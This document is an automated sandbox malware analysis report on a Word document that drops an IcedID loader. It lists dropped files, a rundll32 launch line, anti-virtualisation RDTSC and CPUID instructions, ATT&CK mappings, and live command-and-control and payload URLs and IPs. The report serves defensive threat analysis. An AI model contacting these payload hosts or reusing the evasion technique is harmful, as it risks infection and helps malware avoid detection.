      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000108C
      Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.drStatic PE information: real checksum: 0x59d91 should be: 0x5f194
      Source: y84FE.tmp.dll.0.drStatic PE information: real checksum: 0x59d91 should be: 0x5f194
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
      Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002AC0 SwitchToThread,SwitchToThread,5_2_0000000180002AC0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dllJump to dropped file
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002174 rdtsc 5_2_0000000180002174
      Source: C:\Windows\System32\rundll32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000133C
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000108C
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_0000000180001C28
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002174 rdtsc 5_2_0000000180002174
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_00041189 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00041189

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80Jump to behavior
      Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1Jump to behavior
      Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_00041593 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_00041593
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW,5_2_0000000180002018

      Stealing of Sensitive Information

      barindex
      Yara detected IcedID
      Source: Yara matchFile source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
      Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

      Remote Access Functionality

      barindex
      Yara detected IcedID
      Source: Yara matchFile source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
      Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Command and Scripting Interpreter      		Path Interception111
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium2
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts12
      Scripting      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools      		LSASS Memory22
      Security Software Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth14
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Native API      		Logon Script (Windows)Logon Script (Windows)111
      Process Injection      		Security Account Manager1
      Account Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts33
      Exploitation for Client Execution      		Logon Script (Mac)Logon Script (Mac)12
      Scripting      		NTDS1
      System Owner/User Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer123
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets1
      Remote System Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Rundll32      		Cached Domain Credentials1
      System Network Configuration Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      File and Directory Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
      System Information Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      dodsonimaging,file,08.11.2022.doc26%VirustotalBrowse
      dodsonimaging,file,08.11.2022.doc100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll100%AviraHEUR/AGEN.1251556
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll100%AviraHEUR/AGEN.1251556
      C:\Users\user\AppData\Local\Temp\~DF4786325F45128C5F.TMP100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      5.2.rundll32.exe.180000000.1.unpack100%AviraHEUR/AGEN.1205098Download File
      5.2.rundll32.exe.7fef74d0000.2.unpack100%AviraHEUR/AGEN.1251556Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      alexbionka.com0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rma0%Avira URL Cloudsafe
      http://alexbionka.com/0%Avira URL Cloudsafe
      http://45.8.1460%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm&0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rm0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmli0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT&0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6510%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmj0%Avira URL Cloudsafe
      http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv&0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      alexbionka.com
      		64.227.108.27
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        alexbionka.comtrue
        • Avira URL Cloud: safe
        		unknown
        http://alexbionka.com/true
        • Avira URL Cloud: safe
        		unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmar8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://45.8.146rundll32.exe, 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		low
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm&r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm516F-U91Z1DJNJ2U9D-823/rm3/rm3/rmrundll32.exe, 00000005.00000002.946524016.0000000000420000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmlir8F8A.tmp.exe, 00000004.00000002.947204650.0000000000520000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmT&r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://45.8.146.139/fhfty/O-M--V4GO651r8F8A.tmp.exe, 00000004.00000002.947212998.0000000000544000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmjr8F8A.tmp.exe, 00000004.00000002.947197812.0000000000360000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rmv&r8F8A.tmp.exe, 00000004.00000002.947193974.00000000002C0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        45.8.146.139
        		unknownRussian Federation
        		44676VMAGE-ASRUfalse
        64.227.108.27
        		alexbionka.comUnited States
        		14061DIGITALOCEAN-ASNUStrue

        General Information

        Joe Sandbox Version:35.0.0 Citrine
        Analysis ID:682555
        Start date and time:2022-08-11 17:26:52 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 6m 25s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:dodsonimaging,file,08.11.2022.doc
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • GSI enabled (VBA)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.expl.evad.winDOC@5/14@2/2
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 57.5% (good quality ratio 39.1%)
        • Quality average: 51.4%
        • Quality standard deviation: 40.7%
        HCA Information:
        • Successful, ratio: 97%
        • Number of executed functions: 28
        • Number of non-executed functions: 23
        Cookbook Comments:
